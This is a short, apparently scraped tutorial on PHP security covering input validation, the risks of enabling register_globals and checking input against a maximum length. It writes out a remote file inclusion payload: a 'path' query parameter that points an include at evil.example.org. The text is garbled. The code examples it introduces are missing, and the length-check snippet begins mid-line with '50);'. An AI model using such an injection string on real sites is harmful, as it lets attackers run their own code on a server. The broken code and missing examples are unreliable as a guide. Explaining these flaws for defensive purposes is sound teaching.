Now-a-days web security has been a major concern.During development, when the code is being written, it is important to consider illegitimate uses of your application. Often, the focus is on making the application work as intended, and while this is necessary to deliver a properly functioning application, it does nothing to help make the application secure. fact that you are here is evidence that you care about security,
Since PHP is a growing language being used for the web development,It's very important to discuss about PHP security.
Input flaws
most common PHP security flaws is the unvalidated input error. User-provided data simply cannot be trusted and should be validated properly.
register_globals = OFF. The register_globals directive is disabled by default in PHP versions 4.2.0 and greater.Enabling register_globals may cause a security risk.
A common example to explain the problem is as follows.
this example that illustrates how register_globals can be problematic is the following use of include with a dynamic path:
With register_globals enabled, this page can be requested with ?path=http%3A%2F%2Fevil.example.org%2F%3F in the query string in order to equate this example to the following:
Always validate input data against maxlength in PHP.you can use array and for each to do this.
50);
foreach($max as $key=>$val)
{
if(strlen($_POST[$key])>$val)
{
//display maxlength error
}
}
?>
